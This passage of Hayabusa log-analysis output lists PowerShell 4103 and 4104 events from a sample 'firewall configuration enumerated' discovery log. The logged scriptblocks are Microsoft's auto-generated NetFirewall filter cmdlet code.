($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { 
[object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 
Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallApplicationFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallApplicationFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = 
$myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if 
($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallInterfaceFilter ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated 
(PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 
